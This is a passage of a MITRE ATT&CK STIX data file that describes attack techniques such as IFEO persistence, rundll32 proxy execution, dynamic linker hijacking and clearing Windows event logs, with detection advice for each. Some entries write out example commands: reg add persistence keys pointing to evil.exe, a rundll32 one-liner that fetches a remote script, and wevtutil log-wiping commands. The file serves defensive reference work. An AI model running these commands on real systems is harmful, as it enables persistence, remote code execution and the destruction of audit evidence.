the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nAn example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)\n\n* reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\" /v GlobalFlag /t REG_DWORD /d 512\n* reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v ReportingMode /t REG_DWORD /d 1\n* reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v MonitorProcess /d \"C:\\temp\\evil.exe\"\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.\n\nMalware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Oddvar Moe, @oddvarmoe"], "x_mitre_detection": "Monitor for common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Autoruns Analysis"], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--62166220-e498-410f-a90a-19d4339d4e99", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1183", "external_id": "T1183"}, {"source_name": "Microsoft Dev Blog IFEO Mar 2010", "description": "Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). Retrieved December 18, 2017.", "url": "https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/"}, {"source_name": "Microsoft GFlags Mar 2017", "description": "Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017.", "url": "https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview"}, {"source_name": "Microsoft Silent Process Exit NOV 2017", "description": "Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018.", "url": "https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit"}, {"source_name": "Oddvar Moe IFEO APR 2018", "description": "Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.", "url": "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "FSecure Hupigon", "description": "FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017.", "url": "https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml"}, {"source_name": "Symantec Ushedix June 2008", "description": "Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017.", "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Rundll32", "description": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ricardo Dias", "Casey Smith"], "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_defense_bypassed": ["Anti-virus", "Application whitelisting", "Digital Certificate Validation"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5", "created": "2017-05-31T21:31:06.045Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1085", "external_id": "T1085"}, {"source_name": "Trend Micro CPL", "description": "Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.", "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf"}, {"source_name": "This is Security Command Line Confusion", "description": "B. Ancel. (2014, August 20). Poweliks \u2013 Command Line Confusion. Retrieved March 5, 2018.", "url": "https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Modify Existing Service", "description": "Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).\n\nAdversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.\n\nAdversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Travis Smith, Tripwire", "Matthew Demaske, Adaptforward"], "x_mitre_detection": "Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence. (Citation: TechNet Autoruns) \n\nService information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services.\n\nCommand-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute [cmd](https://attack.mitre.org/software/S0106) commands or scripts.\n\nLook for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", "created": "2017-05-31T21:30:34.928Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1031", "external_id": "T1031"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/551.html", "external_id": "CAPEC-551"}, {"source_name": "Twitter Service Recovery Nov 2017", "description": "The Cyber (@r0wdy_). (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.", "url": "https://twitter.com/r0wdy_/status/936365549553991680"}, {"source_name": "Microsoft Service Recovery Feb 2013", "description": "Microsoft. (2013, February 22). Set up Recovery Actions to Take Place When a Service Fails. Retrieved April 9, 2018.", "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662(v=ws.11)"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Trap", "description": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.\n\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Linux"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", "created": "2020-01-24T14:17:43.906Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/005", "external_id": "T1546.005"}, {"source_name": "Trap Manual", "description": "ss64. (n.d.). trap. Retrieved May 21, 2019.", "url": "https://ss64.com/bash/trap.html"}, {"source_name": "Cyberciti Trap Statements", "description": "Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, 2019.", "url": "https://bash.cyberciti.biz/guide/Trap_statement"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Dynamic Linker Hijacking", "description": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)\n\nOn Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python\u2019s os.environ.\n\nOn Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) \n\nOn macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_detection": "Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD and DYLD_INSERT_LIBRARIES, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", "created": "2020-03-13T20:09:59.569Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574/006", "external_id": "T1574.006"}, {"source_name": "Man LD.SO", "description": "Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020.", "url": "https://www.man7.org/linux/man-pages/man8/ld.so.8.html"}, {"source_name": "TLDP Shared Libraries", "description": "The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020.", "url": "https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html"}, {"source_name": "Apple Doco Archive Dynamic Libraries", "description": "Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021.", "url": "https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html"}, {"source_name": "Baeldung LD_PRELOAD", "description": "baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021.", "url": "https://www.baeldung.com/linux/ld_preload-trick-what-is"}, {"source_name": "Code Injection on Linux and macOS", "description": "Itamar Turner-Trauring. (2017, April 18). \u201cThis will only hurt for a moment\u201d: code injection on Linux and macOS with LD_PRELOAD. Retrieved December 20, 2017.", "url": "https://www.datawire.io/code-injection-on-linux-and-macos/"}, {"source_name": "Uninformed Needle", "description": "skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.", "url": "http://hick.org/code/skape/papers/needle.txt"}, {"source_name": "Phrack halfdead 1997", "description": "halflife. (1997, September 1). Shared Library Redirection Techniques. Retrieved December 20, 2017.", "url": "http://phrack.org/issues/51/8.html"}, {"source_name": "Brown Exploiting Linkers", "description": "Tim Brown. (2011, June 29). Breaking the links: Exploiting the linker. Retrieved March 29, 2021.", "url": "http://www.nth-dimension.org.uk/pub/BTL.pdf"}, {"source_name": "TheEvilBit DYLD_INSERT_LIBRARIES", "description": "Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020.", "url": "https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/"}, {"source_name": "Timac DYLD_INSERT_LIBRARIES", "description": "Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020.", "url": "https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/"}, {"source_name": "Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass", "description": "Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II.. Retrieved March 24, 2021.", "url": "https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-16T17:40:37.995Z", "name": "Local Account", "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. \n\nFor example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as username, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary. For network infrastructure devices, collect AAA logging to monitor for account creations.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network", "Containers"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", "created": "2020-01-28T13:50:22.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1136/001", "external_id": "T1136.001"}, {"source_name": "cisco_username_cmd", "description": "Cisco. (2023, March 6). username - Cisco IOS Security Command Reference: Commands S to Z. Retrieved July 13, 2022.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-t2.html#wp1047035630"}, {"source_name": "Kubernetes Service Accounts Security", "description": "Kubernetes. (n.d.). Service Accounts. Retrieved July 14, 2023.", "url": "https://kubernetes.io/docs/concepts/security/service-accounts/"}, {"source_name": "Microsoft User Creation Event", "description": "Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.", "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:06.362Z", "name": "Loss of Productivity and Revenue", "description": "Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. \n\nIn cases where these operations or services are brought to a halt, the loss of productivity may eventually present an impact for the end-users or consumers of products and services. The disrupted supply-chain may result in supply shortages and increased prices, among other consequences. \n\nA ransomware attack on an Australian beverage company resulted in the shutdown of some manufacturing sites, including precautionary halts to protect key systems. (Citation: Paganini, Pierluigi June 2020) The company announced the potential for temporary shortages of their products following the attack. (Citation: Paganini, Pierluigi June 2020) (Citation: Lion Corporation June 2020) \n\nIn the 2021 Colonial Pipeline ransomware incident, the pipeline was unable to transport approximately 2.5 million barrels of fuel per day to the East Coast. (Citation: Colonial Pipeline Company May 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0828", "external_id": "T0828"}, {"source_name": "Colonial Pipeline Company May 2021", "description": "Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08 ", "url": "https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption"}, {"source_name": "Lion Corporation June 2020", "description": "Lion Corporation 2020, June 26 Lion Cyber incident update: 26 June 2020 Retrieved. 2021/10/08 ", "url": "https://lionco.com/2020/06/26/lion-update-re-cyber-issue/"}, {"source_name": "Paganini, Pierluigi June 2020", "description": "Paganini, Pierluigi 2020, June 14 Ransomware attack disrupts operations at Australian beverage company Lion Retrieved. 2021/10/08 ", "url": "https://securityaffairs.co/wordpress/104749/cyber-crime/ransomware-attack-hit-lion.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-01-31T03:17:42.004Z", "name": "Communication Through Removable Media", "description": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.(Citation: ESET Sednit USBStealer 2014) Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media is mounted.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", "created": "2017-05-31T21:31:09.379Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1092", "external_id": "T1092"}, {"source_name": "ESET Sednit USBStealer 2014", "description": "Calvet, J. (2014, November 11). Sednit Espionage Group Attacking Air-Gapped Networks. Retrieved January 4, 2017.", "url": "http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:06.577Z", "name": "Spearphishing Attachment", "description": "Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T0863) to gain execution and access. (Citation: Enterprise ATT&CK October 2019) \n\nA Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012, targeted ONG organizations and their employees. The emails were constructed with a high level of sophistication to convince employees to open the malicious file attachments. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Process: Process Creation", "File: File Creation", "Network Traffic: Network Traffic Content", "Application Log: Application Log Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0865", "external_id": "T0865"}, {"source_name": "CISA AA21-201A Pipeline Intrusion July 2021", "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf"}, {"source_name": "Enterprise ATT&CK October 2019", "description": "Enterprise ATT&CK 2019, October 25 Spearphishing Attachment Retrieved. 2019/10/25 ", "url": "https://attack.mitre.org/techniques/T1193/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-16T12:40:58.536Z", "name": "Clear Windows Event Logs", "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\n\nWith administrator privileges, the event logs can be cleared with the following utility commands:\n\n* wevtutil cl system\n* wevtutil cl application\n* wevtutil cl security\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command Remove-EventLog -LogName Security to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)\n\nAdversaries may also attempt to clear logs by directly deleting the stored log files within `C:\\Windows\\System32\\winevt\\logs\\`.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Lucas Heiligenstein"], "x_mitre_deprecated": false, "x_mitre_detection": "Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: \"The audit log was cleared\").", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti Virus", "Host Intrusion Prevention Systems", "Log Analysis"], "type": "attack-pattern", "spec_version": "2.1", "id": 